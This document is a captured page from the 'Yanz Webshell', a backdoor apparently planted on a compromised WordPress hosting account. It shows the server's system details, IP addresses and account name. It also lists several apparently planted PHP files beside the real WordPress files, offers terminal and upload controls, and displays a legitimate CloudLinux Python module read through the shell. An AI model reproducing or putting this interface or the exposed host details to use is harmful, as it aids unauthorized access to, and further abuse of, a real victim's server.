Attention:
Uname:
Php:
Hdd:
Cwd:		Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
8.3.30 Safe mode: OFF Datetime: 2026-05-05 15:28:08
3907.15 GB Free: 1081.97 GB (27%)
/home/repauqkb/public_html/ drwxr-x--- [ root ] [ home ] Text

Server IP:
198.54.116.179
Client IP:
216.73.216.147
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2026-05-05 09:27:21drwxr-x---Rename Touch
[ .. ]dir2025-04-18 09:10:57drwx--x--xRename Touch
[ wp-admin ]dir2026-05-05 01:36:32drwxr-xr-xRename Touch
[ wp-content ]dir2026-05-05 01:36:33drwxr-x---Rename Touch
[ wp-includes ]dir2026-05-05 01:36:38drwxr-xr-xRename Touch
.hcflag31 B2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
.htaccess626 B2026-05-05 01:36:36-r--r--r--Rename Touch Edit Download
.htaccess.bk243 B2026-04-28 01:30:21-rw-r--r--Rename Touch Edit Download
.litespeed_flag297 B2026-05-05 01:36:06-rw-r--r--Rename Touch Edit Download
error_log14.92 MB2026-05-05 15:28:07-rw-r--r--Rename Touch Edit Download
goods.php173.77 KB2026-05-05 01:13:55-rw-r--r--Rename Touch Edit Download
index.php16.36 KB2026-05-05 01:36:36-r--r--r--Rename Touch Edit Download
license.txt19.44 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
lock360.php1.40 KB2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
options-privacy-more.php768 B2025-06-24 17:01:07-rw-r--r--Rename Touch Edit Download
qinfofuns.php12.90 KB2026-04-23 18:25:11-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-activate.php7.18 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-blog-header.php351 B2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-conffg.php122.70 KB2026-05-05 01:13:55-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-config.php3.55 KB2026-03-27 14:45:59-rw-r--r--Rename Touch Edit Download
wp-cron.php5.49 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-crrm.php77.12 KB2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.43 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-login.php50.23 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-settings.php30.33 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-trackback.php5.09 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wper.php16.31 KB2026-01-27 01:19:39-rw-r--r--Rename Touch Edit Download
xmlrpc.php3.13 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
yeni.php27.21 KB2026-04-23 17:49:33-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Writeable)
Make file: (Writeable)
Terminal:
Upload file: (Writeable)

HEX
HEX
Server: LiteSpeed
System: Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: repauqkb (12019)
PHP: 8.3.30
Disabled: NONE
$ pwd: /opt/cloudlinux/venv/lib/python3.11/site-packages/ssa/
Upload Files
File: //opt/cloudlinux/venv/lib/python3.11/site-packages/ssa/website_isolation.py
# -*- coding: utf-8 -*-

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

"""
Website isolation support for SSA (clos_ssa.ini) files.

This module provides functions to manage clos_ssa.ini files in per-website
directories when CageFS website isolation is enabled.
"""

import logging
import os
import subprocess
from glob import iglob

from secureio import disable_quota

from .clos_ssa_ini import (
    INI_FILE_NAME,
    INI_USER_LOCATIONS_BASE,
    INI_USER_LOCATIONS_WEBSITE_ISOLATION,
    is_excluded_path,
    extract_php_version,
)

# Try to import website isolation check from securelve (cagefs)
try:
    from clcagefslib.domain import is_website_isolation_allowed_server_wide, is_isolation_enabled
except ImportError:
    def is_website_isolation_allowed_server_wide():
        return False

    def is_isolation_enabled(user):
        return False

logger = logging.getLogger(__name__)


def copy_inis_to_website_isolation_paths(user_context_func) -> None:
    """
    Copy clos_ssa.ini files from base user paths to per-website directories.

    :param user_context_func: Context manager function for user permissions
    """
    if not is_website_isolation_allowed_server_wide():
        return

    # Collect all base ini files: {(user, php_ver): (content, uid, gid)}
    base_ini_files = {}
    for location in INI_USER_LOCATIONS_BASE:
        for dir_path in iglob(location['path']):
            if is_excluded_path(dir_path):
                continue
            try:
                pw_record = location['user'](dir_path)
            except:
                logger.debug("Cannot get pw_record for path: %s", dir_path)
                continue

            ini_file = os.path.join(dir_path, INI_FILE_NAME)
            if not os.path.exists(ini_file):
                continue

            try:
                with open(ini_file) as f:
                    php_ver = extract_php_version(dir_path)
                    if php_ver:
                        base_ini_files[(pw_record.pw_name, php_ver)] = (
                            f.read(), pw_record.pw_uid, pw_record.pw_gid
                        )
            except Exception:
                logger.warning('Failed to read %s', ini_file)
                continue

    if not base_ini_files:
        return

    created_ini = set()

    # Copy to per-website directories
    for location in INI_USER_LOCATIONS_WEBSITE_ISOLATION:
        for dir_path in iglob(location['path']):
            if is_excluded_path(dir_path):
                continue
            try:
                pw_record = location['user'](dir_path)
            except:
                logger.debug("Cannot get pw_record for path: %s", dir_path)
                continue
            if not is_isolation_enabled(pw_record.pw_name):
                continue

            php_ver = extract_php_version(dir_path)
            if not php_ver:
                continue

            key = (pw_record.pw_name, php_ver)
            if key not in base_ini_files:
                continue

            content, uid, gid = base_ini_files[key]
            ini_file = os.path.join(dir_path, INI_FILE_NAME)
            if not os.path.exists(os.path.dirname(ini_file)):
                continue
            try:
                with user_context_func(uid, gid), disable_quota():
                    with open(ini_file, 'w') as f:
                        f.write(content)
                created_ini.add(pw_record.pw_name)
            except Exception as e:
                logger.warning('Failed to create %s: %s', ini_file, str(e))
                continue
    for username in created_ini:
        _regenerate_user_website_isolation(username)


def remove_inis_from_website_isolation_paths(user_context_func) -> None:
    """
    Remove clos_ssa.ini files from all per-website directories.

    :param user_context_func: Context manager function for user permissions
    """
    if not is_website_isolation_allowed_server_wide():
        return

    removed_ini = set()

    for location in INI_USER_LOCATIONS_WEBSITE_ISOLATION:
        for dir_path in iglob(location['path']):
            if is_excluded_path(dir_path):
                continue
            try:
                pw_record = location['user'](dir_path)
            except:
                continue

            ini_file = os.path.join(dir_path, INI_FILE_NAME)
            if os.path.exists(ini_file):
                try:
                    with user_context_func(pw_record.pw_uid, pw_record.pw_gid):
                        os.unlink(ini_file)
                    removed_ini.add(pw_record.pw_name)
                except Exception as e:
                    logger.warning('Failed to remove %s: %s', ini_file, str(e))
                    continue
        for username in removed_ini:
            _regenerate_user_website_isolation(username)


def _regenerate_user_website_isolation(user: str) -> None:
    """
    Needed to terminate php processes to immediately apply clos_ssa.ini creation/deletion.
    """
    try:
        subprocess.run(
            ["/usr/sbin/cagefsctl", "--site-isolation-regenerate", user],
            capture_output=True,
            check=True,
            text=True
            )
    except subprocess.CalledProcessError as e:
        logger.warning(
            "Failed to trigger cagefsctl site isolation regeneration for %s: %s",
            user,
            e.stdout
        )


def regenerate_inis_for_user(user: str, user_context_func) -> None:
    """
    Regenerate clos_ssa.ini files for a specific user's website isolation directories.

    This is called by cagefsctl when enabling website isolation for a user.
    Only creates per-website ini files if base per-user ini exists.

    :param user: Username to regenerate ini files for
    :param user_context_func: Context manager function for user permissions
    """
    if not is_website_isolation_allowed_server_wide():
        return

    logger.info('Regenerating clos_ssa.ini for user %s website isolation...', user)

    # First, collect existing base ini files for this user: {php_ver: (content, uid, gid)}
    base_ini_files = {}
    for location in INI_USER_LOCATIONS_BASE:
        for dir_path in iglob(location['path']):
            if is_excluded_path(dir_path):
                continue
            try:
                pw_record = location['user'](dir_path)
                if pw_record.pw_name != user:
                    continue
            except:
                logger.debug("Cannot get pw_record for path: %s", dir_path)
                continue

            ini_file = os.path.join(dir_path, INI_FILE_NAME)
            if not os.path.exists(ini_file):
                continue

            try:
                with open(ini_file) as f:
                    php_ver = extract_php_version(dir_path)
                    if php_ver:
                        base_ini_files[php_ver] = (f.read(), pw_record.pw_uid, pw_record.pw_gid)
            except Exception:
                logger.warning('Failed to create %s', ini_file)
                continue

    if not base_ini_files:
        logger.info('No base clos_ssa.ini files found for user %s', user)
        return

    # Copy to per-website directories
    for location in INI_USER_LOCATIONS_WEBSITE_ISOLATION:
        for dir_path in iglob(location['path']):
            if is_excluded_path(dir_path):
                continue
            try:
                pw_record = location['user'](dir_path)
                if pw_record.pw_name != user:
                    continue
            except:
                logger.debug("Cannot get pw_record for path: %s", dir_path)
                continue

            php_ver = extract_php_version(dir_path)
            if not php_ver:
                continue

            if php_ver not in base_ini_files:
                continue

            content, uid, gid = base_ini_files[php_ver]
            ini_file = os.path.join(dir_path, INI_FILE_NAME)
            if not os.path.exists(os.path.dirname(ini_file)):
                continue
            try:
                with user_context_func(uid, gid), disable_quota():
                    with open(ini_file, 'w') as f:
                        f.write(content)
                logger.info('Created %s', ini_file)
            except Exception as e:
                logger.warning('Failed to create %s: %s', ini_file, str(e))
                continue

    logger.info('Finished regenerating for user %s!', user)
@ Telegram